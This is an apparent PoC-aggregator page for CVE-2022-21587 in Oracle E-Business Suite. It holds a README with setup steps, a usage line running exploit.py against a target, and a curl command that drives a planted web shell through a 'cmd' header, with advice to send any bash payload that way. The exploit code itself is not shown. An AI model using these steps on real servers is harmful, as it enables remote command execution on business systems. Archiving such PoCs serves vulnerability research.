CVE-2022-21587 PoC — Oracle E-Business Suite 访问控制错误漏洞

Source

https://github.com/merlyn-1/CVE-2022-21587-Oracle-EBS

Associated Vulnerability

Title:Oracle E-Business Suite 访问控制错误漏洞 (CVE-2022-21587)
Description:Oracle E-Business Suite（电子商务套件）是美国甲骨文（Oracle）公司的一套全面集成式的全球业务管理软件。该软件提供了客户关系管理、服务管理、财务管理等功能。 Oracle E-Business Suite 的 Oracle Web Applications Desktop Integrator 12.2.3-12.2.11 版本存在安全漏洞。未经身份验证的攻击者通过 HTTP 进行网络访问，从而破坏 Oracle Web Applications Desktop Integrat

Description

build cve 2022

Readme

Prerequirement for this exploit to run:

- python3 including module (requests, os, sys, slipit)
- uuencode



Before you run, make sure to use for only on ethical duties


if the exploit Fail to run:
- Make sure you already install the pre req module

install requests
- pip3 install requests


- Install slipit, git clone https://github.com/usdAG/slipit
  - cd slipit
  - python3 setup.py sdist
  - pip3 install --user dist/* OR python3 -m pip install --user dist/*
  
- Install uuencode
  - sudo apt install sharutils
  
 

- Usage : python3 exploit.py http://target.com
  - then the shell will poping up OR you can also execute the shell using curl or web proxies tools(burpsuite)
  - using curl : curl -k https://target/OA_CGI/FNDWRR.exe -H 'cmd: whoami'
  - using burpsuite: Just adding `cmd` in header request with any bash payload you want execute

File Snapshot


 [4.0K]  /data/pocs/23d46c9094aee63249ec86b8ac1ef937eef9b9ef
├── [1.6K]  exploit.py
├── [ 855]  README.md
├── [ 514]  t.uue
├── [ 118]  txkFNDWRR.pl
└── [ 350]  txkFNDWRR.zip

1 directory, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!